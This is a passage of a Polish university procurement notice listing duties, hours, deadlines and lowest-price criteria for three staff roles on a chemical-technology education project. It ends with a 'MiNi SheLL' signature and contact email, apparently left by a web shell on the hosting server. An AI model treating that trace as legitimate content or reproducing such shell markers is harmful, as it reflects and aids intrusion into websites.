1.Wspieranie kierownika projektu w zakresie koordynowania zadań w ramach projektu związanych z organizacją kursów, szkoleń, zajęć wyrównawczych i warsztatów.
2.Współdziałanie z kierownikiem projektu, oraz jednostkami organizacyjnymi uczelni zaangażowanymi w realizację projektu.
3.Organizacja kursów językowych dla studentów kierunku Technologia chemiczna.
4.Organizacja zajęć wyrównawczych z przedmiotów ścisłych: matematyka, fizyka, chemia dla studentów I roku kierunku Technologia chemiczna.
5.Organizacja specjalistycznych kursów komputerowych.
6.Organizacja warsztatów z przedsiębiorczości, ekonomii oraz zakładania firmy.
7.Organizacja warsztatów tematycznych z udziałem producentów i dystrybutorów aparatury badawczej.
8.Organizacja kursu specjalistycznego REACH.
9.Organizacja szkoleń z ochrony środowiska naturalnego i rozwiązań proekologicznych w procesie produkcji
10.Organizacja zadań w ramach projektu, w tym: 
realizowanie i wdrażanie projektu w oparciu o jego harmonogram i budżet oraz właściwe przepisy prawne i organizacyjne;
opracowywanie projektów procedur wewnętrznych dotyczących realizacji projektu;
uczestniczenie w spotkaniach w ramach projektu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dobór personelu- asystenta ds. administracyjnych i ewaluacji projektu do realizacji projektu pn. Technolog Chemiczny- Inżynier Przyszłości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca do zrealizowania zamówienia wskaże jedną osobę
Ilość godzin:  70 godz./miesiąc - 40 miesięcy
Zakres wykonywanych zadań na stanowisku Asystenta ds. administracyjnych 
i ewaluacji projektu:
1.Wykonywanie czynności administracyjno-biurowych niezbędnych do realizacji projektu.
2.Współdziałanie z kierownikiem projektu, oraz jednostkami organizacyjnymi uczelni zaangażowanymi w realizację projektu
3.Organizacja zadań w ramach projektu, w tym: 
realizowanie i wdrażanie projektu w oparciu o jego harmonogram i budżet oraz właściwe przepisy prawne i organizacyjne;
organizowanie pracy zespołu projektowego;
opracowywanie projektów procedur wewnętrznych dotyczących realizacji projektu;
przygotowywanie spotkań w ramach projektu; uczestniczenie w spotkaniach;
4.Sprawdzanie pod względem merytorycznym i formalnym wszelkich dokumentów, pism, opracowań itp.
5.Sprawowanie kontroli nad realizacją kolejnych etapów projektu, w tym zgodności z planami, założeniami, harmonogramami, umowami oraz innymi dokumentami dotyczącymi realizacji projektu i informowanie na bieżąco kierownika projektu
6.Rekrutacja i monitoring uczestników projektu, w tym zbieranie i weryfikacja danych za pomocą ankiet ewaluacyjnych, sprawozdań, testów kompetencji, list obecności, zbieranie danych i ich uzupełnianie w systemie PEFS
7.Utworzenie i aktualizacje strony www projektu
8.Działania informacyjne, w tym zamieszczanie ogłoszeń na stronie www projektu 
i WIiTCh oraz przygotowywanie i rozsyłanie korespondencji listownej oraz mailowej do uczestników i personelu projektu
9.Weryfikacja kompletności wniosków stypendialnych
10.Wprowadzanie danych do systemu HMS
11.Tworzenie list stypendialnych
12.Generowanie plików do przelewów świadczeń stypendialnych
13.Monitorowanie statusów studentów oraz wypłacanych świadczeń
14.Merytoryczne wsparcie zespołu przy tworzeniu i ew. zmianach regulaminu stypendialnego projektu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dobór personelu- specjalista ds. finansowych do realizacji projektu pn. Technolog Chemiczny- Inżynier Przyszłości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca do zrealizowania zamówienia wskaże jedną osobę
Ilość godzin: 70 godz./miesiąc - 40 miesięcy
Zakres wykonywanych zadań na stanowisku Specjalisty ds. finansowych
1.Wykonywanie czynności księgowych i kadrowych niezbędnych do realizacji projektu i koordynacja realizacji finansowej projektu - zgodność wydatków poszczególnych zadań z planowanym budżetem, korekty budżetu.
2.Rozliczanie wydatków w projekcie.
3.Wspieranie kierownika projektu w zakresie koordynowania zadań w ramach projektu, w tym: 
planowania zadań do realizacji zgodnie z opracowanym harmonogramem rzeczowo-finansowym projektu.
4.Współdziałanie z kierownikiem projektu oraz jednostkami organizacyjnymi uczelni zaangażowanymi w realizację projektu.
5.Organizacja zadań w ramach projektu, w tym: 
realizowanie i wdrażanie projektu w oparciu o jego harmonogram i budżet oraz właściwe przepisy prawne i organizacyjne;
opracowywanie projektów procedur wewnętrznych dotyczących realizacji projektu;
uczestniczenie w spotkaniach w ramach projektu
6.Sprawdzanie pod względem formalnym i rachunkowym dokumentów, pism, itp.
7.Sprawowanie kontroli nad częścią finansową projektu, w tym zgodności z planami, założeniami, harmonogramami, umowami oraz innymi dokumentami dotyczącymi realizacji projektu i informowanie na bieżąco kierownika projektu.
8.Kontakty z Instytucją Pośredniczącą
9.Przygotowywanie umów cywilno-prawnych, prowadzenie ewidencji czasu pracy, opisywanie faktur, archiwizacja na WIiTCh 
10.Przygotowywanie w zespole projektowym wniosków o płatność
11 .Przygotowanie sprawozdań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com